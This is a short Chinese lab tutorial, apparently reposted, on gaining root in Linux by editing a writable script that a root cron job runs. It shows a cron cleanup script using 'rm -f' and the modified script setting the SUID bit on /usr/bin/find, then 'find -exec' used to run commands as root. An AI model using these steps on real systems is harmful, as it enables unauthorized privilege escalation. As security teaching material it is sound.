计划任务提权


一、实验环境

1、在crontab(/etc/crontab)下设置一个新的计划任务来运行一个python脚本,该脚本删除特定目录中的所有数据 python脚本
#!/usr/bin/env python

import os
import sys
try:
      os.system('rm -f /home/kali/clearup/*')
except:
      sys.exit()

二、提权准备

1、查看计划任务

cat /etc/crontab

2、修改脚本(前提是你得有权限写)

#!/usr/bin/env python

import os
import sys
try:
      #os.system('rm -f /home/kali/clearup/*')
      os.system('chmod u+s /usr/bin/find')
except:
      sys.exit()

三、等待计划任务执行

ls -alh /usr/bin/find
find abc -exec "whoami" \;


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM